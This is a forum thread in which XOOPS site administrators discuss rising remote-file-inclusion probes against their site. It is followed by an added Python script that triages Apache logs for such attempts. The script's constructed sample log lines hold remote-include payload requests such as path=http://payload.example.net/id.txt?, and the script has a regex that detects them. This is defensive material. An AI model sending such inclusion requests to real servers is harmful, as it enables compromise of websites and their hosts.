Quote:
Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the server's setup and try to get shell access.
Yes, I use Protector, I wouldn't use XOOPS without it. Yep, lots of the text files have 'passthru' and other commands in them, clearly malicious activity, which I'd expect, but it has risen so much, I'm wondering if there is a new XOOPS exploit that people know about, and they are giving the site a hammering.
Fortunately, the server is configured to return a 403 on most of these, or a 404.
Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new exploit, but as yet unknown to a lot of people. Found one at
http://www.milw0rm.com/exploits/2623 , but it is dated Oct 2006, a long time ago.
Quote:
Where are these log entries from, anyway? They look funky.
Coming from many different IP addresses. Hmm, 'look funky', not too sure what you mean there? Oh, the domain name has been changed, for obvious security reasons, we don't want people actually trying it.
Quote:
If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills.
In the past, I sometimes used to actually look up the IP and contact the person/s concerned, and CC in their ISP, but that was when there were only a few a day. Much of that contact resulted in either the person having their account suspended or terminated, or other action. Most hosts appreciated being contacted. Also, as you mention, contact the 'source' from where the scripts are served, yes, did that in the past, in a lot of cases, it resulted in the file being removed. But some sort of automated system would be better.
Quote:
You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.
The host I use has it all tied down fairly well, but the 403 messages have now changed to 404s, so I'll ask why the server change.
Quote:
*edit* But probably, you don't want to have anything to do with those tugzip folks. So forget the suggestion about contacting them. In any case, make sure you don't use Internet Explorer if you want to look around at what's going on there.
Yes, I don't use IE, Firefox for me.
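Added example, not from the thread above: a small Python triage script of the kind the poster wishes were automated. It runs over constructed Apache access-log lines, flags requests whose query parameters point at a remote script (the remote txt payloads discussed above), and groups them by source IP, payload host and target script (such as the 'database.php' hits) so the host/ISP contacts and the 403-versus-404 review can start from a summary. All IPs, hostnames and paths are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; IPs, hosts and paths are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2008:02:11:53 +0000] "GET /database.php?path=http://payload.example.net/id.txt? HTTP/1.1" 403 217 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Mar/2008:02:11:54 +0000] "GET /modules/news/index.php?path=http://payload.example.net/c.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Mar/2008:02:14:02 +0000] "GET /index.php?page=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2008:02:15:40 +0000] "GET /modules/foo/bar.php?cfg=https://other.example.org/x.txt HTTP/1.1" 200 4096 "-" "Mozilla/4.0"
"""

# Apache combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3})')
# A query-string value that is itself an absolute URL is the remote-include signature.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Return the fields we care about, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.group(1), m.group(4), int(m.group(6))
    parts = urlsplit(target)
    remote = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if REMOTE_URL.match(v)]
    return {"ip": ip, "path": parts.path, "status": status, "remote_includes": remote}


def find_rfi_attempts(log_text):
    """Keep only requests that tried to pull in a remote script via a parameter."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["remote_includes"]:
            rec["payload_hosts"] = sorted({urlsplit(v).hostname for _, v in rec["remote_includes"]})
            hits.append(rec)
    return hits


def summarize(hits):
    """Counts for the contact-the-host workflow, plus hits the server did not reject."""
    return {
        "by_source_ip": Counter(h["ip"] for h in hits),
        "by_payload_host": Counter(host for h in hits for host in h["payload_hosts"]),
        "by_target_script": Counter(h["path"] for h in hits),
        # A 2xx here does not prove the include ran, but it is the first thing to check.
        "not_rejected": [h for h in hits if h["status"] < 400],
    }


if __name__ == "__main__":
    for key, value in summarize(find_rfi_attempts(SAMPLE_LOG)).items():
        print(key, value)
```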